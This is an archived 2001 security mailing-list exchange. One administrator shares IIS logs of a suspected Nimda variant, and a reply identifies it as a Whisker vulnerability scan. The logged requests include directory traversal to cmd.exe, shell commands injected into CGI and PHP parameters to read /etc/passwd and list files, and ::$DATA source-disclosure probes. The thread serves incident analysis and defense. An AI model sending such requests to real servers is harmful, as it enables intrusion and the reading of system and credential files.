Looks like a Whisker scan to me. http://www.wiretrip.net/rfp/p/doc.asp/i2/d21.htm -Steve > -----Original Message----- > From: Howard Gleason [mailto:howard.gleasonat_private] > Sent: Friday, November 16, 2001 7:53 AM > To: incidentsat_private > Subject: possible new Nimda variant > > > Mailer: SecurityFocus > > Anyone else seen this, it hit my IIS logs last night. It has > some similarities to Nimda but > not identical. > -------------------------------------------------- > #Fields: date time c-ip cs-username s-sitename cs-method > cs-uri-stem cs-uri-query > sc-status sc-win32-status sc-bytes cs-bytes time-taken s-port > cs-version cs(User-Agent) > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD / - 400 87 > 138 19 47 80 > HTTP\1.0 - > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /msadc/ - 404 > 2 143 26 15 80 > HTTP/1.0+ - > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /scripts/ - > 403 5 143 28 16 80 > HTTP/1.0+ - > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 GET > /scripts/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe > /c+dir 500 87 0 98 0 > 80 HTTP/1.0+ - > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /cgi-bin/ - > 404 2 143 28 0 80 > HTTP/1.0+ - > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /bin/ - 404 2 > 143 24 0 80 > HTTP/1.0+ - > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /samples/ - > 404 2 143 28 0 80 > HTTP/1.0+ - > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /_vti_cnf/ - > 404 2 143 29 0 80 > HTTP/1.0+ - > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /_vti_bin/ - > 404 2 143 29 0 80 > HTTP/1.0+ - > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /iisadmpwd/ - > 404 2 143 30 0 80 > HTTP/1.0+ - > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 GET > /winnt/system32/cmd.exe /c+dir > 404 3 604 98 0 80 HTTP/1.0+ - > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 GET > /winnt/system32/cmd.exe /c+dir > 404 3 604 89 0 80 HTTP/1.0+ - > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 GET > /winnt/system32/cmd.exe /c+dir > 404 3 604 125 0 80 HTTP/1.0+ - > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /Default.htm > - 200 0 278 22 0 80 > HTTP/1.0+ - > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /lanscan.ida > - 404 2 143 33 15 > 80 HTTP/1.0+ - > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /lanscan.idq > - 404 2 143 33 0 80 > HTTP/1.0+ - > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /cfdocs/ - > 404 2 143 27 0 80 > HTTP/1.0+ - > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /cfide/ - 404 > 2 143 26 0 80 > HTTP/1.0+ - > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD > /_vti_inf.html - 404 2 143 35 0 80 > HTTP/1.0+ - > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /tsweb - 404 > 2 143 27 0 80 > HTTP/1.0+ - > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD > /_vti_bin/_vti_aut/ - 404 3 143 39 > 0 80 HTTP/1.0+ - > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 GET > /default.asp::$DATA - 404 2 604 > 39 0 80 HTTP/1.0+ - > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 GET /default.asp. > - 404 2 604 35 0 80 > HTTP/1.0+ - > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /cgi-bin/ - > 404 2 143 28 0 80 > HTTP/1.0+ - > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /Default.htm > - 200 0 278 22 0 80 > HTTP/1.0+ - > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /carbo.ddl - > 404 2 143 31 0 80 > HTTP/1.0+ - > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /technote/ - > 404 2 143 29 0 80 > HTTP/1.0+ - > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /iisadmpwd/ - > 404 2 143 30 0 80 > HTTP/1.0+ - > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /cgi-dos/ - > 404 2 143 28 0 80 > HTTP/1.0+ - > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /scripts/ - > 403 5 143 28 0 80 > HTTP/1.0+ - > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD > /scripts/perl.exe - 404 2 143 36 0 > 80 HTTP/1.0+ - > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD > /mall_log_files/ - 404 2 143 35 0 > 80 HTTP/1.0+ - > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /Admin_files/ > - 404 2 143 32 0 > 80 HTTP/1.0+ - > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 GET /quote.html - > 404 2 604 31 0 80 > HTTP/1.0+ - > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD > /cgi-bin/ikonboard/ - 404 3 143 > 38 0 80 HTTP/1.0+ - > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /foldoc/ - > 404 2 143 27 0 80 > HTTP/1.0+ - > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD > /cgi-bin/adcycle/ - 404 3 143 36 > 0 80 HTTP/1.0+ - > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /ROADS/ - 404 > 2 143 26 16 80 > HTTP/1.0+ - > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /way-board/ - > 404 2 143 30 0 80 > HTTP/1.0+ - > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD > /cgi-bin/a1stats/ - 404 3 143 36 > 0 80 HTTP/1.0+ - > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 GET /index.php > chemin=..%2F..%2F..%2F..%2F..%2F..%2Fetc 404 2 604 71 0 80 HTTP/1.0+ - > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 GET /scripts/shopplus.cgi > dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd| > 404 2 604 98 0 80 > HTTP/1.0+ - > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 GET /edit_image.php > dn=1&userfile=/etc/passwd&userfile_name=%20;ls;%20 404 2 604 > 86 0 80 HTTP/1.0+ - > > -------------------------------------------------------------- > -------------- > This list is provided by the SecurityFocus ARIS analyzer service. > For more information on this free incident handling, management > and tracking system please see: http://aris.securityfocus.com > ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Fri Nov 16 2001 - 08:44:18 PST